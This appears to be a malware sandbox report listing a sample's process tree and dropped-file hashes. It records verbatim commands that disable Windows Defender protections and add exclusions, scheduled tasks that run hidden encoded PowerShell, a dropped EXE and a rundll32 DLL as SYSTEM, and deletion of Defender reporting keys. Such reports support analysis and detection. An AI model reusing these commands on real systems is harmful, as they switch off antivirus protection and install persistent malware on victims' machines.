C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4236
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5108
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CGnJgFCBAzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CGnJgFCBAzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DGkdqERBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DGkdqERBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PFmWviqWHYwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PFmWviqWHYwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VyejTHXZDswSKCkodlR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VyejTHXZDswSKCkodlR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mClEBLvlRMFiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mClEBLvlRMFiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WUQzEHOimFfJbvVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WUQzEHOimFfJbvVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUSqPVaaVaTonAKz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUSqPVaaVaTonAKz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:323⤵PID:1708
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:324⤵PID:4484
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CGnJgFCBAzUn" /t REG_DWORD /d 0 /reg:643⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:323⤵PID:3108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGkdqERBU" /t REG_DWORD /d 0 /reg:643⤵PID:3372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:323⤵PID:4004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PFmWviqWHYwU2" /t REG_DWORD /d 0 /reg:643⤵PID:680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:323⤵PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VyejTHXZDswSKCkodlR" /t REG_DWORD /d 0 /reg:643⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:323⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mClEBLvlRMFiC" /t REG_DWORD /d 0 /reg:643⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WUQzEHOimFfJbvVB /t REG_DWORD /d 0 /reg:323⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WUQzEHOimFfJbvVB /t REG_DWORD /d 0 /reg:643⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv /t REG_DWORD /d 0 /reg:323⤵PID:1572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\RrGfQtYPiwOkePUDv /t REG_DWORD /d 0 /reg:643⤵PID:2724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUSqPVaaVaTonAKz /t REG_DWORD /d 0 /reg:323⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUSqPVaaVaTonAKz /t REG_DWORD /d 0 /reg:643⤵PID:1860
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gczxraWIi" /SC once /ST 04:12:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2204
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gczxraWIi"2⤵PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gczxraWIi"2⤵PID:4072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jCymsroQFbYeGMouD" /SC once /ST 06:43:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\WebdBLG.exe\" UZ /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jCymsroQFbYeGMouD"2⤵PID:4776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2808
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4828
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2332
-
C:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\WebdBLG.exeC:\Windows\Temp\yUSqPVaaVaTonAKz\eQZzzKLpMZsikyh\WebdBLG.exe UZ /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWfTenrnZRhiBbesVI"2⤵PID:3884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1720
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4784
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3536
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DGkdqERBU\NBUiuD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "PPsmXAxsGZAbEXH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PPsmXAxsGZAbEXH2" /F /xml "C:\Program Files (x86)\DGkdqERBU\vxbCAyP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "PPsmXAxsGZAbEXH"2⤵PID:4232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PPsmXAxsGZAbEXH"2⤵PID:4000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WHQzDDOHAZqOHK" /F /xml "C:\Program Files (x86)\PFmWviqWHYwU2\GjIwWMB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4180
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pXGIZihhpDsVF2" /F /xml "C:\ProgramData\WUQzEHOimFfJbvVB\kQSkxXe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iQPxrWWaWFquCysLb2" /F /xml "C:\Program Files (x86)\VyejTHXZDswSKCkodlR\CdCzGCm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "squTHRQnmBqJEUNkdBT2" /F /xml "C:\Program Files (x86)\mClEBLvlRMFiC\HAUpHji.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vuBtYGxUFUjHFzcbJ" /SC once /ST 12:48:20 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yUSqPVaaVaTonAKz\BACyFiqq\NFIdgMr.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vuBtYGxUFUjHFzcbJ"2⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3180
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1036
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3996
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jCymsroQFbYeGMouD"2⤵PID:3068
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yUSqPVaaVaTonAKz\BACyFiqq\NFIdgMr.dll",#1 /site_id 5254031⤵PID:456
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yUSqPVaaVaTonAKz\BACyFiqq\NFIdgMr.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2848 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vuBtYGxUFUjHFzcbJ"3⤵PID:2748
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5fd0c74e1ca0d55728cd5a1b90262ba72
SHA1741eaec429b8816aee01c0f57dc89cd8418c7316
SHA256a9f500cbbaa4159e623dabd27397f2be1fafb6e314bb469a6d021837d6b5aae3
SHA512bc691885de9d3416eef5212599757f33091958ca4a7331fa11d473c2663fe9f5e97af821ba92b6ea526f8d980f5f13927abe33ceae33d1dd059e1d9d80962321
-
Filesize
2KB
MD569d669c2e6ab046267e9694debb04faf
SHA175b9c29d420fe25d22b0421c5b9aba6178ed04d3
SHA25623cbdc73f419f760b33a3820356f2620de3f68c514e0dfe25d16b4fcb0406989
SHA51219021559401ab1a4e74c0d70130709a9ba5cd7fcd65ce70df77da7d8d4dc7bf4b96d75994705004cfdf3c50fa574d02f583b50596c834dcb1a2983f22d80477d
-
Filesize
2KB
MD507880f5cbd18368f52a33c512da544fa
SHA16244752936df592d416d69034a0b6c8b9e0c02f8
SHA256f0803a626fc9abec9a8a75409d90781e871b7ecb75dbc233de996c7215ce51be
SHA512eac7f035214a38597ce255166cc9735dca16901b699576c3a158a60bbc4cdce07fc6e9f86f9758e5f602506198ad1d8fd4cb41677ed1cfa8d8eb8032645a28d2
-
Filesize
2KB
MD5e237a4833c95d2d6c467076f5f9b0fcc
SHA1e66bcb3545589f9aa4665d26a1dc774dca628d83
SHA2565a830b3605899d8547db5eea63ce1b9b2bf61ad01ec8f7fbf3fb404e06064b6c
SHA51231e8dc00643dce043fd72c75fbca84e91e352dc69211cbde90c8643c30dc39c6191a98f4aed527be51a8b07dbdffb02ac263020ca5134055cc61431554cb405b
-
Filesize
2KB
MD539f6f9d99fc2d27c8b95dd6ba377254a
SHA13048bfdf23cc250f980223ee5471f5e1ba60f684
SHA256c65bc66e7ff265d0e39475fd5f01c67a9216fb01046c57c0ee4b304d12580fec
SHA512babdf45267070d0c75cd494d2d6d5958bf9b7b0d95b004660b257bdf14b476c0dd262790b76bbe1609f375b4ab72f17b5fce3e485b0775eb4ee103fb34934914
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.7MB
MD565edf485cc3303cff0b329b4712ee4bb
SHA1bf6a58391157b990aaa9f337284e35881d5859c5
SHA256f37d7fb5114e9b7487c5d795f54fa8499037d6ac2f87d5872ee63d044e487f03
SHA512779b1651a520d12f24acfb9c4c1e4fb10001409e1e215f3becab4d567bfff9080cee13fa540985278314734843c8b7e197cff5fd1287ff907f6fac83f68da738
-
Filesize
6.7MB
